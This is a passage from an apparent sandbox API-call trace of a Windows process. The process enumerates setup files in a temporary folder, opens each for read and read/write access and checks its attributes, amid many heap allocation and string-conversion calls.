ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0068.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0068.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.636] AreFileApisANSI () returned 1 [0068.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupUi.xsd", lpUsedDefaultChar=0x0) returned 34 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0068.636] AreFileApisANSI () returned 1 [0068.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69210 [0068.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0068.637] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.637] GetFileType (hFile=0x428) returned 0x1 [0068.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0068.637] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.637] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.637] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.637] CloseHandle (hObject=0x428) returned 1 [0068.638] AreFileApisANSI () returned 1 [0068.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x693f0 [0068.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0068.638] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.638] GetFileType (hFile=0x428) returned 0x1 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0068.638] CloseHandle (hObject=0x428) returned 1 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.639] AreFileApisANSI () returned 1 [0068.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69300 [0068.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0068.639] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8)) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.639] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0068.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0068.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0068.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.751] AreFileApisANSI () returned 1 [0068.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupUtility.exe", lpUsedDefaultChar=0x0) returned 39 [0068.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0068.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.751] AreFileApisANSI () returned 1 [0068.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0068.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0068.751] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.752] GetFileType (hFile=0x410) returned 0x1 [0068.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.752] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.752] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.752] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.752] CloseHandle (hObject=0x410) returned 1 [0068.752] AreFileApisANSI () returned 1 [0068.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cef8 [0068.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6cef8, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0068.753] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.753] GetFileType (hFile=0x410) returned 0x1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0068.753] CloseHandle (hObject=0x410) returned 1 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.754] AreFileApisANSI () returned 1 [0068.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0068.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0068.754] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758)) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.754] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.754] 